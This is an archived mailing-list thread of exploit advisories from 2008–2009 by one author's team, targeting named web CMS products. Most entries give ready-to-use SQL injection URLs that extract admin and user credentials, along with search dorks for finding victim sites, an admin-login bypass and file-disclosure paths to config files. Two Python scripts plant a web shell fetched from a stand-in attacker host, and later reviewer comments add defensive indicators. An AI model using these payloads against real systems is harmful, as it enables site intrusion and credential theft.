Bugs Online v2.14 Sql Injection

2009-01-30 Thread r3d . w0rm
#
Bugs Online v2.14  Sql Injection
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://sourceforge.net/project/showfiles.php?group_id=42528 
#
#   
#
#Dork : ext:asp Welcome to bugs online  
#
#   
#
#
#  [Bug]
#
#   
#
#http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1
#   
#
## TNX GOD 
##


PHP-Nuke 8.0 Downloads Blind Sql Injection

2009-01-23 Thread r3d . w0rm
#
   PHP-Nuke 8.0 Downloads Blind Sql Injection   
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://phpnuke.org  
#
#   
#
#Dork : inurl:modules.php?name=Downloads PHP-Nuke 
#
#   
#
#
#  [Bug]
#
#   
#
#Admin Username : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*

#Users Username : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
   
#Users Password : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*

#   
#
#
#  [Note]   
#
#   
#
#1. magic_quotes_gpc = Off  
#
#2. register_globals = On   
#
#3. To use this bug you must be logged in as an ordinary (non-admin) user.
#
#4. After using bug go to this url :
#
#http://[site]/[path]/modules.php?name=Downloadsd_op=Addemail=attac...@devil.nettitle=zzurl=zzdescription=zz
#5. The URL uses ASCII codes and a null byte to bypass the PHP-Nuke security function;
#
#   please do not change the ASCII codes or the %00.
#
#   
#
## TNX GOD 
##


Asp-project Cookie Handling

2009-01-22 Thread r3d . w0rm
#
Asp-project Cookie Handling 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://www.sourceforge.net/projects/asp-project 
#
#   
#
#Dork : :(  
#
#   
#
#
#  [Bug]
#
#   
#
#javascript:document.cookie = crypt=1; path=/;
#
#   
#
## TNX GOD 
##


PHP-Fusion Mod Members Bewerb Sql Injection

2009-01-07 Thread r3d . w0rm
#
PHP-Fusion Mod Members Bewerb Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=204
#   
#
#Dork : :(  
#
#   
#
#
#  [Bug]
#
#   
#
#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
#   
#
#You must be logged in to use this bug.
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


PHP-Fusion Mod E-Cart Sql Injection

2009-01-07 Thread r3d . w0rm
#
PHP-Fusion Mod E-Cart Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=281
#   
#
#Dork : inurl:/infusions/e_cart 
#
#   
#
#
#  [Bug]
#
#   
#
#Username : 
http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_name,1,2%20from%20fusion_users/*
#   
#
#Password : 
http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_password,1,2%20from%20fusion_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Madrese-Portal Sql Injection

2008-12-29 Thread r3d . w0rm
#
Madrese-Portal Sql Injection
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://dl.p30vel.ir/scripts/Madrese-Portal-Asp-Eh3an.p-(www.p30vel.ir).rar
#   
#
#Dork : Design By ASD Tasarim 
#
#   
#
#
#  [Bug]
#
#   
#
#Username : 
http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
#   
#
#Password : 
http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Mavi Emlak Sql Injection

2008-12-29 Thread r3d . w0rm
#
   Mavi Emlak Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://dl.p30vel.ir/scripts/Asp-Amlak-Best-Pro-Eh3an.p-(www.p30vel.ir).rar
#   
#
#Dork : © 2004 Copyright by Mavi Emlak Danismanligi 
#
#   
#
#
#  [Bug]
#
#   
#
#http://Site/[path]/newDetail.asp?haberNo=-%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
#   
#
#Admin panel : http://Site/[path]/yonet 
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


PHP-Fusion Mod TI - Blog System Sql Injection

2008-12-25 Thread r3d . w0rm
#

PHP-Fusion Mod TI - Blog System Sql Injection   
 

#

#   
#

#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#

#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi

#

#   
#

#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=157

#   
#

#

#  [Bug]
#

#   
#

#http://Site/[path]/blog.php?page=blog_idid=-'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##


ASP-CMS v.1.0 Sql Injection/Database Disclosure

2008-12-12 Thread r3d . w0rm
#
  ASP-CMS v.1.0 Sql Injection/Database Disclosure   
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : 
http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
#   
#
#DORK : :(  
#
#   
#
#
# [Sql Injection]   
#
#   
#
#Username : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#   
#
#Password : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#   
#
#
#   [Database Disclosure]   
#
#   
#
#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb   
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Joomla Component GameQ

2008-12-04 Thread r3d . w0rm
#
Joomla Component GameQ  
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : http://joomlacode.org/gf/project/gameq  
#
#   
#
#DORK : inurl:option=com_gameq  
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Joomla Component mydyngallery

2008-12-04 Thread r3d . w0rm
#
  Joomla Component mydyngallery 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : http://mydyngallery.mon-cottenchy.fr
#
#   
#
#DORK : inurl:option=com_mydyngallery   
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[joomla_path]/index.php?option=com_mydyngallerydirectory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


boastMachine v3.1 Remote Sql Injection

2008-11-20 Thread r3d . w0rm
#
boastMachine v3.1 Remote Sql Injection  
 
#
#   
#
#AUTHOR : R3d.W0rm (Sina Yazdanmehr)
#
#Discovered by : R3d.W0rm (Sina Yazdanmehr) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : www.boastology.com  
#
#   
#
#DORK : Powered by boastMachine v3.1
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[path]/mail.php?action=R3d.W0rmblog=1id=-9'+union+select+0,1,concat_ws(0x7c,user_login,user_pass),3+from+bmc_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Arab Portal v2.1 Remote File Disclosure (Win32)

2008-11-06 Thread r3d . w0rm
#

Arab Portal v2.1 Remote File Disclosure (Win32) 
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : R3d.W0rm (Sina Yazdanmehr) 
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#

#

#   
#

#Download : www.arabportal.net  
#

#   
#

#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html   
#

#   
#

#

#   [Bug]   
#

#   
#

#http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\File.Type 
#

#   
#

#Config File :  
#

#http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\..\..\admin\conf.php  
#

#   
#

#Note : This bug works only on Windows servers.
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##


minb Remote Code Execution Exploit

2008-09-11 Thread r3d . w0rm
#!/usr/bin/python

#

 minb Remote Code Execution Exploit 
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Site : http://minb.sf.net  
#

#   
#

#Download : 
http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2#

#   
#

#DORK : Powered by minb 
#

#   
#

#

# [Note]
#

#   
#

#All PHP files in this CMS have this bug ;)
#

#   
#

#

# Site : Http://IRCRASH.COM 
#

## TNX GOD 
##

import sys,urllib

# NOTE(review): this listing was damaged when the mailing-list archive was
# extracted: string quotes, the comparison operator in the argument check and
# all indentation are missing, so it does not parse as Python as shown. The
# code is kept exactly as archived; the comments describe what the visible
# lines do and what a defender of a minb install should look for.
#
# Inputs: argv[1] is the base URL of a minb install, argv[2] is the URL of a
# remote text file. Both get an 'http://' prefix if the substring is absent.
#
# Usage banner, printed when the argument count check fails.
if len(sys.argv)3 :

print minb Remote code Execution Exploit

print Powered by : R3d.W0rm

print www.IrCrash.com

print Usage :  + sys.argv[0] +  http://Target/path http://evil/shell.txt;

print Ex.  + sys.argv[0] +  http://site.com/minb http://r3d.a20.ir/r.txt;

exit()

if 'http://' not in sys.argv[1] :

sys.argv[1]='http://' + sys.argv[1]

if 'http://' not in sys.argv[2] :

sys.argv[2]='http://' + sys.argv[2]

# Request path used for both requests below: a module file addressed directly,
# with a `parse` query parameter. Web-log indicator: any direct request to
# /include/modules/top/1-random_quote.php carrying `parse=`.
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'

# The POST body has one form field, `quotes_to_edit`, whose value is a run of
# PHP statements: open the argv[2] URL, read it in 1024-byte chunks, and write
# the result to ../../../upload/pictures/r3d.w0rm.php.
# NOTE(review): presumably the module stores this field unescaped in a PHP file
# that is evaluated later; the vulnerable server code is not shown, so confirm
# against the minb source. Fix direction: never write request data into
# executable PHP, and keep module files from being requested directly.
# The remote fopen() only works when PHP's allow_url_fopen is enabled, and it
# shows up as an outbound HTTP fetch from the web server.
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=;$s=fopen(\'' + 
sys.argv[2] + 
'\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})

# First request is a POST (urlopen is given a data argument), second is a plain
# GET of the same path. Neither response is read.
urllib.urlopen(sys.argv[1] + fp,data)

urllib.urlopen(sys.argv[1] + fp)

# Success test: fetch the dropped file and treat any body without the text
# 'Not Found' as success. File-system indicator: a .php file under
# upload/pictures/. Serving the upload directory with PHP execution disabled
# removes the final step.
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()

if 'Not Found' not in test :

print Shell Uploaded .

print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'

exit()



Stash v1.0.3 Admin bypass / Remote File Disclosure

2008-09-09 Thread r3d . w0rm
#
   Stash v1.0.3 Admin bypass / Remote File Disclosure   
 
#
#   
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#
#
#   
#
#Download : 
http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#   
#
#DORK : :(  
#
#   
#
#
#[Admin bypass]
#
#   
#
#http://Site/[path]/admin/login 
#
#Username : ' or 1=1/*  
#
#Password : R3d.W0rm
#
#   
#
#
#[Remote File Disclosure]   
#
#   
#
#http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x[file
 name in hex])/* 
#   
#
#Note : You must enter the file name in hex in the vulnerable URL to download it.
#
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 
#
#http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
 
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


munky-bliki lfi

2008-08-15 Thread r3d . w0rm
#!user/bin/python

# -*- coding: cp1256 -*-

#

   munky-bliki Lfi  
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Script Download : 
http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz

#   
#

#DORK : Copyright © 2004 Dovid Kopel  
#

#   
#

#

#  [Bug]
#

#   
#

#http://Site/?zone=file.type%00 
#

# [Note]
#

#   
#

#With this exploit you can create a shell on the vulnerable site ;)
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##

import httplib,urllib

# NOTE(review): this listing was damaged when the mailing-list archive was
# extracted (string quotes and angle brackets are missing), so it does not
# parse as Python as shown. The code is kept exactly as archived; the comments
# describe what the visible lines do and what a defender should look for.
#
# Inputs read interactively: target host, install path, and the URL of a
# remote file.
site=raw_input('Site [Ex www.r3d.com]: ')

path=raw_input('Path [Ex /munky]: ')

shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')

print [*]Powered by : R3d.W0rm - [EMAIL PROTECTED]

conn=httplib.HTTPConnection(site)

print [*]Connected to  + site

print [*]Sending shell code ...

# Step 1: a GET whose `zone` query parameter carries PHP source instead of a
# zone name. That source would create r3d.w0rm.php containing an include of
# the remote URL. No response is read after the request is sent.
# NOTE(review): presumably the application records the requested zone in
# logs/counts.log, which step 2 then loads; the server code is not shown, so
# confirm against the munky-bliki source.
# Web-log indicator: a `zone` value containing PHP tags or function calls.
conn.request('GET',path + 
/?zone=?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'?php%20include%20\\'
 + shell + \\';?');fclose($fp);?)

print [*]Running shell code ...

# Step 2: request the same parameter with a relative path to the log file and
# a trailing %00, matching the [Bug] line in the header (zone=file.type%00).
# Fix direction: map `zone` to an allowlist of known names and reject path
# separators and NUL bytes. PHP 5.3.4 and later refuse paths containing NUL.
# Keep log files out of any includable path. The dropped file's remote include
# additionally needs allow_url_include enabled.
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')

# The success messages below are printed unconditionally; nothing checks that
# the file exists. File-system indicator: r3d.w0rm.php in the install directory.
print [*]Shell created

print [*] + site + path + '/r3d.w0rm.php'







Ovidentia Sql Injection

2008-08-11 Thread r3d . w0rm

  Ovidentia Sql Injection   
 

#   
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  
   
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   


#   
   
#Script Download : www.ovidentia.org

#   

#DORK : Powered by Ovidentia  

#   


#  [Bug]

#   

#http://Site/index.php?tg=contactidx=modifyitem=-9'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#   

# [Note]

#   

#You must be logged in as an ordinary user to use this bug ;)

#   

#
#   Site : Http://IRCRASH.COM   
 
## TNX GOD 
##


MyClan Sql Injection

2008-08-06 Thread r3d . w0rm
#
MyClan Sql Injection
 
#
#   

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  
   
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   

#
#   

#Script Download : www.sourceforge.net/projects/haudenschilt

#   

#DORK : Copyright A© 2005-2006 Battle.net Clan Script 1.5.2 

#   

#
#  [Bug]

#   

#http://Site/index.php?page=membersshowmember='+union+select+name,1,2,password+from+bcs_members/*
#http://Site/index.php?page=boardthread=-+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*
#   

# [Note]

#   

#If you inject and crack the admin password, you can upload a shell on the medal page in the admin panel ;)
#   

#
#   Site : Http://IRCRASH.COM   

## TNX GOD 
##


UNAK-CMS Lfi

2008-08-04 Thread r3d . w0rm
#
#  UNAK-CMS Lfi 
#
#   

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   

#
#   

#Script Download : www.unak.net 

#   

#DORK : Powered by UNAK-CMS   

#   

#
#  [Lfi]

#   

#http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00
#   

#
#   Site : Http://IRCRASH.COM   

## TNX GOD 
##


eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG

2008-08-01 Thread r3d . w0rm
#
   eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG   
 
#
#   
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#
#
#   
#
#Script Download : 
http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#   
#
#DORK : :(  
#
#   
#
#
#[Sql Injection]
#
#   
#
#Blind : http://Site/print.php?id=1'+and+1=1/*  
#
#http://Site/style.php?template=1module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=usernamemodule=users/*
#
#Pass : http://Site/iframe.php?field=passmodule=users/*
#
# [IG]  
#
#http://Site/admin/phpinfo.php  
#
#   
#
#[Remote File Disclosure]   
#
#   
#
#http://Site/admin/show_img.php?type=text/plainimg=File
#
#Ex. http://Site/admin/show_img.php?type=text/plainimg=../vars.php [Get 
database user  pass]
#   
#
#   [Remote File Upload]
#
#Exploit :  
#
#   
#
#html 
#
#!--   
#
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))   
# 
#Http://IrCrash.Com 
#
#//--  
#
#form action='http://[Site]/admin/x_image.php?type=background' method=post 
enctype=multipart/form-data
#input type=file name='file_upload'   
#
#input type=hidden name=insert value=1
#
#input type=hidden name=s_rc value='file://'  
#
#input type=submit
#
#/form
#
#/html
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##